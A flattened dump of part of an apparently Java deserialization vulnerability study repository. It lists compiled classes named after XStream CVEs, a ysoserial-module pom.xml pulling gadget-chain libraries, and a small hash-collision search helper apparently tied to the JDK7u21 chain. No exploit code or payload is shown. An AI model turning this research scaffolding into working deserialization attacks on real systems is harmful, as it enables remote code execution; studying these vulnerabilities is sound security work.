-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39141.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39144.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39144.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39145.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39145.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39150.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39150.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39153.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39153.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/test.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2019_10173.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2019_10173.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39146.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39146.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39147.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39147.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39148.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39148.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39154.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39154.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/ImpTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/ImpTest.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/School.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/School.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/Student.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/Student.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/Test$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/Test$1.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/Test.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/TestInterface.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/TestInterface.class -------------------------------------------------------------------------------- /ysoserial/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | ysoserial 13 | 14 | 15 | 16 | javassist 17 | javassist 18 | 3.12.1.GA 19 | 20 | 21 | org.beanshell 22 | bsh 23 | 2.0b5 24 | 25 | 26 | com.r17a 27 | weblogic 28 | 1.0-SNAPSHOT 29 | compile 30 | 31 | 32 | com.r17a 33 | common 34 | 1.0-SNAPSHOT 35 | compile 36 | 37 | 38 | commons-beanutils 39 | commons-beanutils 40 | 1.9.2 41 | 42 | 43 | commons-collections 44 | commons-collections 45 | 3.1 46 | 47 | 48 | org.apache.commons 49 | commons-collections4 50 | 4.0 51 | 52 | 53 | org.python 54 | jython-standalone 55 | 2.5.2 56 | 57 | 58 | commons-io 59 | commons-io 60 | 2.6 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /ysoserial/src/main/java/com/r17a/ysoserial/jdk7u21/HashBruteTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.ysoserial.jdk7u21; 2 | 3 | public class HashBruteTest { 4 | public static void main(String[] args) { 5 | // System.out.println(Long.toHexString(4276154445L).hashCode()); 6 | // for (long i = 0; i < 9999999999L; i++) { 7 | // if (Long.toHexString(i).hashCode() == 15) { 8 | // System.out.println(Long.toHexString(i)); 9 | // } 10 | // } 11 | caculate(); 12 | // int x=114; 13 | // 14 | // x ^= (x >>> 20) ^ (x>>> 12); 15 | // System.out.println( x ^ (x >>> 7) ^ (x >>> 4)); 16 | // System.out.println("---------------------"); 17 | // System.out.println(intHash(new int[]{-16})); 18 | 19 | } 20 | 21 | public static void caculate() { 22 | 23 | for (int i = 0; i < 100;i++){ 24 | int h =0; 25 | h ^= i; 26 | h ^= (h >>> 20) ^ (h >>> 12); 27 | 28 | if ( (h ^ (h >>> 7) ^ (h >>> 4) )== 15){ 29 | System.out.println("i:" + i); 30 | } 31 | } 32 | } 33 | 34 | public static int intHash(int[] a){ 35 | if (a == null) 36 | return 0; 37 | 38 | int result = 1; 39 | for (int element : a) 40 | result = 31 * result + element; 41 | 42 | return result; 43 | } 44 | } 45 | --------------------------------------------------------------------------------